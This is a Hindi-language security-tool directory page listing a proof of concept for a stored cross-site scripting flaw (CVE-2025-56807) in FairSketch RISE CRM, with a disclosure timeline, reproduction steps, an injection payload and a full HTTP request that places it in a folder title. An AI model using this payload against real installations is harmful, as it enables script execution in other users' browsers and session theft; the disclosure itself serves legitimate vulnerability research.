Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-56807 — FairSketch RISE अल्टीमेट प्रोजेक्ट मैनेजर और CRM v3.9.4 में संग्रहीत XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट, फ़ोल्डर शीर्षक इंजेक्शन के माध्यम से मनमाना JavaScript निष्पादन का प्रदर्शन। | Kitploit
उपकरण/GitHubGitHub/aqwainfosec/cve-2025-56807
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

FairSketch RISE अल्टीमेट प्रोजेक्ट मैनेजर और CRM v3.9.4 में संग्रहीत XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट, फ़ोल्डर शीर्षक इंजेक्शन के माध्यम से मनमाना JavaScript निष्पादन का प्रदर्शन।

रिपॉजिटरी देखें
11 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-56807

विवरण

FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) में फ़ाइल प्रबंधक कार्यक्षमता में एक संग्रहित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता पाई गई। यह भेद्यता title parameter में है जो नए फ़ोल्डर बनाते समय सबमिट किया जाता है। अपर्याप्त इनपुट सैनिटाइजेशन के कारण, हमलावर HTML/JavaScript payloads (जैसे, <details/open/ontoggle=prompt(origin)>) इंजेक्ट कर सकता है। पेलोड फ़ोल्डर के नाम में संग्रहित हो जाता है और फ़ाइल प्रबंधक में फ़ोल्डरों को सूचीबद्ध करते समय निष्पादित होता है, जिससे प्रभावित फ़ोल्डर को देखने वाले किसी भी उपयोगकर्ता के ब्राउज़र में मनमाना जावास्क्रिप्ट निष्पादन संभव होता है। इसके परिणामस्वरूप सत्र अपहरण और डेटा बहिर्गमन हो सकता है।

[!NOTE]
यह भेद्यता केवल व्यवस्थापक खातों तक सीमित नहीं है। इसे किसी भी उपयोगकर्ता खाते का उपयोग करके शोषित किया जा सकता है जिसके पास फ़ाइल प्रबंधक में नए फ़ोल्डर बनाने की अनुमति है।

प्रकटीकरण समयरेखा

  • निर्दिष्ट CVE ID: CVE-2025-56807
  • खोज: जुलाई 2025 (Aqwa Hameed द्वारा)
  • विक्रेता को सूचित किया गया: Fairsketch समर्थन को ईमेल किया गया
  • प्रतिक्रिया: 22 जुलाई, 2025 को विक्रेता द्वारा स्वीकार किया गया

प्रूफ ऑफ कॉन्सेप्ट (PoC)

  1. वैध क्रेडेंशियल के साथ लॉगिन करें।

  • Files पर जाएँ

    Dashboard

  • New Folder पर क्लिक करें

    File Manager

  • Title फ़ील्ड में नीचे दिया गया पेलोड दर्ज करें:

  • root@kitploit:~
    <details/open/ontoggle=prompt(origin)>
    

    Folder Title

    1. पेलोड को ट्रिगर करने के लिए फ़ाइल प्रबंधक पृष्ठ को पुनः लोड करें

      Payload Execution

    अनुरोध

    root@kitploit:~
    POST /index.php/clients/save_folder HTTP/1.1
    Host: rise.fairsketch.com
    Cookie: [redacted]
    Content-Length: 99
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US,en;q=0.9
    Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
    Sec-Ch-Ua-Mobile: ?0
    X-Requested-With: XMLHttpRequest
    User-Agent: [redacted]
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://rise.fairsketch.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Priority: u=1, i
    Connection: keep-alive
    
    id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
    
    टूल डाउनलोड करें